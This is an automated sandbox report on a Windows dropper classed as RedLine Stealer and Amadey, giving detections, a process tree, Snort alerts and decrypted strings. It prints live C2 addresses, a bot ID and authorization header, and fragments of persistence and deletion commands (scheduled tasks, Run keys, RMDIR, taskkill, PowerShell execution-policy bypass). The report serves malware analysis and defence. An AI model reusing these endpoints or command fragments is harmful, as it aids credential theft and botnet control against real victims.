Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qu0t4ukLoN.exe

Overview

General Information

Sample Name:qu0t4ukLoN.exe
Original Sample Name:1df346c349b9b71b11825690be73e635.exe
Analysis ID:876163
MD5:1df346c349b9b71b11825690be73e635
SHA1:13df3b1666b674f48b1fc2a836fee8ce99381fb5
SHA256:8e96ef86e327dd3bbc1dab16ce1e57e8f380d9b2df919158f1b6786cfd6f717e
Tags:exeRedLineStealer
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • qu0t4ukLoN.exe (PID: 4908 cmdline: C:\Users\user\Desktop\qu0t4ukLoN.exe MD5: 1DF346C349B9B71B11825690BE73E635)
    • v7020033.exe (PID: 5988 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe MD5: A9A0FDF699EB764206C59FF3CA3FAC53)
      • v6434086.exe (PID: 2336 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe MD5: 4D67FD4D3D62A45215D1FBDF9CA87397)
        • a4758283.exe (PID: 6988 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe MD5: 1BE37E0816A88025F557178CA7FC03C8)
          • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • AppLaunch.exe (PID: 6072 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • b7687179.exe (PID: 3320 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe MD5: 927C5B1DEF98D855184A0ED56D8A2787)
  • rundll32.exe (PID: 5760 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5116 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5296 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "77.91.68.62/wings/game/index.php", "Version": "3.83"}

Threatname: RedLine

{"C2 url": "83.97.73.122:19062", "Bot Id": "misa", "Authorization Header": "9e79529a6bdb4962f44d12b0d6d62d32"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0xd00:$pat14: , CommandLine:
        • 0x140e6:$v2_1: ListOfProcesses
        • 0x13e9a:$v4_3: base64str
        • 0x14b69:$v4_4: stringKey
        • 0x1269c:$v4_5: BytesToStringConverted
        • 0x113ef:$v4_6: FromBase64
        • 0x12bd4:$v4_8: procName
        C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Process Memory Space: b7687179.exe PID: 3320JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 1 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    1.3.v7020033.exe.4d85c20.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.3.v6434086.exe.4c3f81e.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.3.v6434086.exe.4c3f81e.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0xd00:$pat14: , CommandLine:
                        • 0x140e6:$v2_1: ListOfProcesses
                        • 0x13e9a:$v4_3: base64str
                        • 0x14b69:$v4_4: stringKey
                        • 0x1269c:$v4_5: BytesToStringConverted
                        • 0x113ef:$v4_6: FromBase64
                        • 0x12bd4:$v4_8: procName
                        1.3.v7020033.exe.4d85c20.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          2.3.v6434086.exe.4c3f81e.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            Click to see the 3 entries

                            Sigma Signatures

                            No Sigma rule has matched

                            Snort Signatures

                            Timestamp:192.168.2.383.97.73.12249697190622043231 05/26/23-11:40:50.159297
                            SID:2043231
                            Source Port:49697
                            Destination Port:19062
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.383.97.73.12249697190622043233 05/26/23-11:40:32.455619
                            SID:2043233
                            Source Port:49697
                            Destination Port:19062
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:83.97.73.122192.168.2.319062496972043234 05/26/23-11:40:36.975680
                            SID:2043234
                            Source Port:19062
                            Destination Port:49697
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exeAvira: detection malicious, Label: HEUR/AGEN.1311185
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                            Found malware configuration
                            Source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "83.97.73.122:19062", "Bot Id": "misa", "Authorization Header": "9e79529a6bdb4962f44d12b0d6d62d32"}
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "77.91.68.62/wings/game/index.php", "Version": "3.83"}
                            Multi AV Scanner detection for submitted file
                            Source: qu0t4ukLoN.exeReversingLabs: Detection: 52%
                            Source: qu0t4ukLoN.exeVirustotal: Detection: 52%Perma Link
                            Antivirus / Scanner detection for submitted sample
                            Source: qu0t4ukLoN.exeAvira: detected
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exeReversingLabs: Detection: 50%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeReversingLabs: Detection: 50%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeReversingLabs: Detection: 69%
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeReversingLabs: Detection: 38%
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeReversingLabs: Detection: 77%
                            Machine Learning detection for sample
                            Source: qu0t4ukLoN.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 77.91.68.62
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: /wings/game/index.php
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 3.83
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: a9e2a16078
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: metado.exe
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SCHTASKS
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: /Create /SC MINUTE /MO 1 /TN
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: /TR "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: " /F
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Startup
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: cmd /C RMDIR /s/q
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: rundll32
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: /Delete /TN "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Programs
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: %USERPROFILE%
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: \App
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: POST
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &vs=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &sd=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &os=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &bi=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &ar=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &pc=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &un=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &dm=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &av=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &lv=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &og=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: cred.dll|clip.dll|
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Main
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: http://
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: https://
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Plugins/
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &unit=
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: shell32.dll
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: kernel32.dll
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: GetNativeSystemInfo
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ProgramData\
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: AVAST Software
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Avira
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Kaspersky Lab
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ESET
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Panda Security
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Doctor Web
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 360TotalSecurity
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Bitdefender
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Norton
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Sophos
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Comodo
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: WinDefender
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 0123456789
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ------
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ?scr=1
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: .jpg
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ComputerName
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: -unicode-
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: VideoID
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: \0000
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: DefaultSettings.XResolution
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: DefaultSettings.YResolution
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: ProductName
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 2019
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 2022
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: 2016
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: CurrentBuild
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: echo Y|CACLS "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: " /P "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: CACLS "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: :R" /E
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: :F" /E
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &&Exit
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: rundll32.exe
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: "taskkill /f /im "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: " && timeout 1 && del
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: && Exit"
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: " && ren
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &&
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Powershell.exe
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: -executionpolicy remotesigned -File "
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor:
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: =
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: (E+8
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor:
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: G
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: KM
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &VqP
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: &VeP
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor:
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: =
                            Source: 1.3.v7020033.exe.4d85c20.0.raw.unpackString decryptor: Au
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A92F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A92F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00212F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00212F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00BC2F1D
                            Source: qu0t4ukLoN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: qu0t4ukLoN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: v7020033.exe, 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, v7020033.exe, 00000001.00000003.357393527.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, c6803120.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: a4758283.exe, 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp, a4758283.exe, 00000003.00000003.360898057.0000000000472000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.383174563.0000000004182000.00000020.00000400.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A92390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00212390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00212390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00BC2390

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49697 -> 83.97.73.122:19062
                            Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49697 -> 83.97.73.122:19062
                            Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 83.97.73.122:19062 -> 192.168.2.3:49697
                            Connects to many ports of the same IP (likely port scanning)
                            Source: global trafficTCP traffic: 83.97.73.122 ports 19062,0,1,2,6,9
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 77.91.68.62/wings/game/index.php
                            Source: Malware configuration extractorURLs: 83.97.73.122:19062
                            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                            Source: Joe Sandbox ViewIP Address: 83.97.73.122 83.97.73.122
                            Source: global trafficTCP traffic: 192.168.2.3:49697 -> 83.97.73.122:19062
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: a4758283.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
